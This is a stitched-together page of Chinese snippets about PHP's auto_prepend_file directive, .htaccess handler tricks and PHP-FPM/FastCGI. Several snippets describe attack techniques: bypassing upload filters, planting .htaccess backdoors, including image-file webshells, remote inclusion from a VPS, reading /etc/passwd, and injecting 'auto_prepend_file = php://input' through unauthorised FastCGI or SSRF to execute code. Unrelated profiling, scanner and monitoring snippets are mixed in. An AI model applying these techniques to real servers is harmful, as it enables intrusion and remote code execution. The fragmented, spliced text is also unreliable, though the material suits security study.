通过向.htaccess文件添加AddType或AddHandler使非php文件被解析 介绍 除了正常的用途外,在渗透中的Apache环境下,可以用.htaccess来重写Apache配置以绕过上传,...可以参考默认生成的配置文件是如何对php进行解析的。...php_value auto_append_file导致500错误 介绍 .htaccess中除了上面的添加文件的php解析以外。...还可以通过添加auto_append_file或auto_prepend_file向所有php文件中的开头或最后插入指定的文件内容。可以用来制作后门。具体可自行百度。...复现方式 网上给出的方法一般是在.htaccess中添加如下代码 php_value auto_prepend_file "/home/fdipzone/header.php" php_value auto_append_file
Apache调用解析器的三种方式 在普遍使用的LAMP架构中,Apache与PHP之间的交互,有三种常见的方式。...其实后者用的越来越广泛了。一般PHP-FPM也是与FastCGI进行配合使用的。 可以参考CGI、FastCGI和PHP-FPM关系图解和Apache下PHP的几种工作方式来了解更多。...在. htaccess中的写入如下: php_value auto_prepend_file "/home/fdipzone/header.php" php_value auto_append_file...写法如下: auto_prepend_file = 123.gif 扩展阅读 Apache httpd 2.4.x 使用 mod_proxy_fcgi 和 PHP-FPM 的方式 PHP中通过bypass...disable functions执行系统命令的几种方式 Nginx 设置 PHP_VALUE 的灵异问题 最后感谢裤衩哥和sssvvf学弟对该问题的共同研究与探讨。
php_value 当使用 PHP 作为 Apache 模块时,可以用 Apache 的配置文件(例如 httpd.conf)或 .htaccess 文件中的指令来修改 PHP 的配置设定。...•auto_prepend_file php_value auto_prepend_file /etc/passwd •auto_append_file php_value auto_append_file...同理,我们也可以让 index.php 文件包含一个含有 Webshell 的文件来 Getshell,可用于图片马的解析: php_value auto_prepend_file images.png....htaccess 文件中的设置为: php_value auto_prepend_file http://192.168.0.181/phpinfo.txt或:php_value auto_append_file...(3)指定目录写文件(error_log) 前面我们已经了解了,error_log 可以将 PHP 运行报错的记录写到指定文件中,利用这一点我们可以写Webshell。但是如何触发报错呢?
还有,Apache必须在所有上级的目录中查找.htaccess文件,以使所有有效的指令都起作用(参见指令的生效),所以,如果请求/www/htdocs/example中的页面,Apache必须查找以下文件...AddHandler 指令可以实现在文件扩展名与特定的处理器之间建立映射。...php_flag 可以设定的配置也是有范围的 php_value 可以用 Apache 的配置文件(例如 httpd.conf)或 .htaccess 文件中的指令来修改 PHP 的配置设定。....htaccess的php_value设置 用法: php_value name value php_value auto_prepend_file images.png 但是并不是所有的...所以想要执行远程文件包含还是要打开allow_url_include php_value auto_prepend_file http://vps/1.txt php_value auto_append_file
PHP 的连接方式 apche2-module 把 php 当做 apache 的一个模块,实际上 php 就相当于 apache 中的一个 dll 或一个 so 文件,phpstudy 的非 nts...FastCGI 模式 fastcgi 本身还是一个协议,在 cgi 协议上进行了一些优化,众所周知,CGI 进程的反复加载是 CGI 性能低下的主要原因,如果 CGI 解释器保持在内存中 并接受 FastCGI...,而 fastcgi 进程又提供了很多辅助功能比如内存管理,垃圾处理,保障了 cgi 的高效性,并且 CGI 此时是常驻在内存中,不会每次请求重新启动 PHP-FPM 这个大家肯定都不陌生,在 linux...web 服务器与他通信 题目的 web 环境也就是 apache-module 的 php 的 disable_function 限制的特别死无法执行系统命令,于是呢就可以通过攻击另一个 php 环境来执行系统命令...(php7 以上都是) ubuntu 安装 php 如何安装 php 可能可以帮助深入理解一下这个过程 如何安装 apache-module apt update apt install -y apache2
啥是PHP-FPM,FastCGI又是啥(大佬请略过0x01章节~) 接下来,我们一起探究漏洞的原理和具体的利用过程吧~ 0x01.CGI、FastCGI、PHP-FPM 我们知道,在网站架构中,Web...和nginx的php5_module、CGI、FastCGI,给IIS的ISAPI,以及Shell的CLI 经过不断的技术升级,目前搭建高性能的PHP Web服务器,最佳的方式是Apache/Nginx...由此,PHP-FPM 就是一个FastCGI进程管理器,是对于 FastCGI 协议的具体实现,它负责管理一个进程池,来处理来自Web服务器的请求。...所以,我们只需要把待执行的代码放在FastCGI协议 Body中,它们就能被执行了 那么我们如何设置PHP.INI中auto_prepend_file的值呢?...同时,也加深了PHP与Web Server之间通信的具体了解与认识 参考 Web安全基础学习之SSRF漏洞利用 Fastcgi协议分析 && PHP-FPM未授权访问漏洞 && Exp编写 浅析php-fpm
很多想做渗透测试的朋友都想了解关于PHP后门漏洞的安全测试重点方法,以及该如何预防被中php后门,本节由我们的Sine安全高级渗透工程师进行全面的讲解,来让大家更好的理解和了解php代码的安全检测,让网站得到最大化的安全保障...后门 4.1.1.1. php.ini构成的后门 利用 auto_prepend_file 和 include_path 4.1.1.2. .htaccess后门 php_value auto_append_file...机制实现 PHP中Disable Function的实现是在php-src/Zend/Zend-API.c中。...auto_prepend_file 和 include_path 4.1.6.2. code execution php_value auto_append_file .htaccess #<?...1 php_value zend.
什么是AWVS Acunetix Web Vulnerability Scanner(简称AWVS)是一款知名的网络漏洞扫描工具,它通过网络爬虫测试你的网站安全,检测流行安全漏洞,现已更新到10。...可以指定IP地址段进行端口扫描(类似于Nmap),可以用与信息收集。 进行了端口扫描后会进行服务发现,得到端口上对应的服务。...3、点击登录过程中的限制(如退出链接常需要限制); 4、输入验证登录成功或失败的标志; 5、Review (AVWS站点扫描中可以选择login sequence、在Site Crawling处也可以选择...login sequence) AcuSensor Deployment: 要在服务器端布置angent进行扫描的一种独特的扫描方式 AcuSensor Deployment指明如何部署angent到服务端...修改.htaccess或php.ini使得agent在服务器上部署生效,这里改php.ini的auto_prepend_file为上述文件路径: php_value auto_prepend_file
接下来的部分将介绍如何在LAMP和LEMP环境中来为xhgui创建虚拟主机。 在LAMP上设置XHGui的虚拟主机 当使用Apache作为Web服务器时,我们首先需要确保mod_rewrite已启用。...接下来的部分将向您展示如何自动将此头文件添加到Apache和Nginx环境中的所有PHP脚本。对于此示例,我们将为作为此服务器上的主网站托管的WordPress应用程序启用分析。...fastcgi_param PHP_VALUE "auto_prepend_file=/var/www/xhgui/external/header.php"; ... } 保存文件并退出。...:此请求需要多长时间才能完成 cpu: CPU执行此请求所花费的时间 mu(内存使用):此请求期间使用的平均内存 pmu(峰值内存使用率):此请求期间内存使用量的峰值 要查看性能分析运行的详细信息,请使用时间字段中的链接...检查函数调用 如果向下滚动到页面底部,您将可以访问一个表,其中包含有关在此请求期间执行的所有函数调用的详细信息,包括函数或方法执行的次数,运行时间,多少它使用的内存,以及许多其他有趣的细节。
五.SSRF 漏洞EXP技巧,典例分析以及 如何修复 (下册) 5.4gopher 协议初探 最近两天看到了字节脉搏实验室公众号上有一篇《Gopher协议与redis未授权访问》的文章,其中对gopher...首先最基础的看一下它如何发送get请求 复现环境 centos7 + kali 2018 在centos7主机使用nc监听端口,nc -lvp 6666 然后用kali使用curl gopher://...啥是PHP-FPM,FastCGI又是啥(大佬请略过0x01章节~) 接下来,我们一起探究漏洞的原理和具体的利用过程吧~ 0x01.CGI、FastCGI、PHP-FPM 我们知道,在网站架构中,Web...所以,我们只需要把待执行的代码放在FastCGI协议 Body中,它们就能被执行了 那么我们如何设置PHP.INI中auto_prepend_file的值呢?...': "localhost", # 服务器的主机名 'SERVER_PROTOCOL': 'HTTP/1.1', # 请求使用的协议版本 'PHP_VALUE': 'auto_prepend_file
什么是AWVS Acunetix Web Vulnerability Scanner(简称AWVS)是一款知名的网络漏洞扫描工具,它通过网络爬虫测试你的网站安全,检测流行安全漏洞,现已更新到10。...Target Finder 可以指定IP地址段进行端口扫描(类似于Nmap),可以用与信息收集。 进行了端口扫描后会进行服务发现,得到端口上对应的服务。...: 3、点击登录过程中的限制(如退出链接常需要限制); 4、输入验证登录成功或失败的标志; 5、Review (AVWS站点扫描中可以选择login sequence、在Site...指明如何部署angent到服务端, 点击生成AcuSensor后可以将对应的文件放置到服务器,放置到服务器后要更改文件的属主和属组: 修改.htaccess或php.ini使得agent在服务器上部署生效...,这里改php.ini的auto_prepend_file为上述文件路径: php_value auto_prepend_file ‘[path to acu_phpaspect.php file]’
这次的SSRF漏洞是出在mod_proxy这个模块中的,我们就来从代码的层面分析一下它的原理是什么,究竟影响有多大。...,canon handler会在反代的时候被调用,用于告诉Apache主程序它应该把这个请求交给哪个处理方法来处理。...这又涉及到PHP-FPM的两个环境变量,PHP_VALUE和PHP_ADMIN_VALUE。...': 'HTTP/1.1' # 使用的协议版本 'PHP_VALUE': 'auto_prepend_file = php://input', # PHP配置:在请求处理之前自动包含...设置auto_prepend_file = php://input且allow_url_include = On,然后将我们需要执行的代码放在Body中,即可执行任意代码。
浏览器访问静态网页过程 在整个网页的访问过程中,Web容器(例如Apache、Nginx)只担任着内容分发者的身份,当访问静态网站的主页时,Web容器会到网站的相应目录中查找主页文件,然后发送给用户的浏览器...img 浏览器访问动态网页过程 当访问动态网站的主页时,根据容器的配置文件,它知道这个页面不是静态页面,Web容器就会去找PHP解析器来进行处理(这里以Apache为例),它会把这个请求进行简单的处理,...、可伸缩架构的CGI开放扩展,其主要行为是将CGI解释器进程保持在内存中,并因此获得较高的性能 。...下面给出一个表格,列出最主要的几种 type: type值 具体含义 1 在与php-fpm建立连接之后发送的第一个消息中的type值就得为1,用来表明此消息为请求开始的第一个消息 2 异常断开与php-fpm...的交互 3 在与php-fpm交互中所发的最后一个消息中type值为此,以表明交互的正常结束 4 在交互过程中给php-fpm传递环境变量时,将type设为此,以表明消息中包含的数据为某个name-value
zabbix agent需要安装在被监视的目标服务器上,它主要完成对硬件信息或与操作系统有关的内存,CPU等信息的收集。...2、Zabbix监控工作原理 Agentd安装在被监控的主机上,Agent负责定期收集客户端本地各项数据,并发送至Zabbix Server端,Zabbix Server收到数据,将数据存储到数据库中...功能类似Server,唯一不同的是它只是一个中转站,它需要把收集到的数据提交/被提交到Server里。...其中-uzabbix是前面在数据库中创建的用户,-p123qqq...A是前面数据库中创建的用户的密码,后面的zabbix是前面创建的数据库。...= apache ... php_value[date.timezone] = Aisa/Shanghai //错误,应该是Asia/Shanghai 修改: php_value[date.timezone
要安装测试环境中,你需要它没有任何正在运行的进程已绑定到端口的Linode 80,8080,3306,和27017。...这涉及估计请求的平均内存和CPU使用率,将其与服务器的总资源级别进行比较,然后调整软件配置以充分利用这些资源。...Linode提供了优化Apache和MySQL的指南: 调整Apache服务器 如何使用MySQLTuner优化MySQL性能 可选:配置您自己的WordPress站点 您可以重复使用本指南提供的XHGUI...对于Apache服务器,将此行插入虚拟主机 - 请记住在文档根目录中替换 - 然后使用以下命令重新加载Apache sudo systemctl reload apache2: php_admin_value...对于NGINX,将此行添加到服务器块,然后使用以下命令重新加载配置文件sudo nginx -s reload: fastcgi_param PHP_VALUE "auto_prepend_file=
当Nginx将包含PATH_INFO为空的fastcgi传递给后端php-fpm时,php-fpm接受处理的过程存在逻辑问题,通过精心构造恶意请求可以对php-fpm进行内存污染,进一步可以复写内存并修改...worker,运行过程中动态调整worker数量 让fpm的工作模式为static,并且work进程只有一个,方便进行调试,设置配置文件如下: pm = static ; The number of child...通过FCGI_GETENV获取request中存储在PHP_VALUE中的ini配置,然后通过zend_parse_ini_string将配置应用ini。...这里获取服务器权限的方式和php-fpm未授权访问的方式相似,都是fastcgi中的PHP_VALUE修改php-fpm的ini,但是php-fpm未授权访问是发送包含PHP_VALUE的fastcgi...ini 继续跟进到已经提过的ini获取部分,发现根据PHP_VALUE字符串得到的索引为105。 在内存污染前查看该部分,发现已经通过payload占位。 ? 污染后已经变为恶意ini。 ?
中_SERVER数组的一部分,也就是PHP里的环境变量。...那么假设我们设置auto_prepend_file为php://input,那么就等于在执行任何php文件前都要包含一遍POST的内容。所以,我们只需要把待执行的代码放在Body中,他们就能被执行了。...(当然,还需要开启远程文件包含选项allow_url_include) 那么,如何设置auto_prepend_file的值?...这又涉及到PHP-FPM的两个环境变量,PHP_VALUE和PHP_ADMIN_VALUE。...这两个环境变量就是用来设置PHP配置项的,PHP_VALUE可以设置模式为PHP_INI_USER和PHP_INI_ALL的选项,PHP_ADMIN_VALUE可以设置所有选项。
浏览器访问静态网页过程 在整个网页的访问过程中,Web容器(例如Apache、Nginx)只担任着内容分发者的身份,当访问静态网站的主页时,Web容器会到网站的相应目录中查找主页文件,然后发送给用户的浏览器...img 浏览器访问动态网页过程 当访问动态网站的主页时,根据容器的配置文件,它知道这个页面不是静态页面,web容器就会去找PHP解析器来进行处理(这里以Apache为例),它会把这个请求进行简单的处理,...、可伸缩架构的CGI开放扩展,其主要行为是将CGI解释器进程保持在内存中,并因此获得较高的性能 。...但是好在php官方允许通过PHP_ADMIN_VALUE和PHP_VALUE去动态修改php的设置。...•在Windows系统中客户端和Mysql服务器在同一台电脑上,可以使用命名管道和共享内存的方式。
它位/etc/zabbix于目录中,由Apache自动加载。我们需要对此文件进行一些小改动,然后将其打开。...php7.c> php_value max_execution_time 300 php_value memory_limit 128M php_value...post_max_size 16M php_value upload_max_filesize 2M php_value max_input_time 300 php_value...为确保工作正常,请关闭受监控的服务器,以便了解Zabbix如何提醒您出现问题。...结论 在本教程中,您学习了如何设置简单安全的监控解决方案,以帮助您监控服务器的状态。它现在可以警告您出现问题,并且您有机会根据获得的数据绘制一些图表,以便您可以对其进行分析并进行相应的计划。
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
对象存储
云直播
腾讯会议
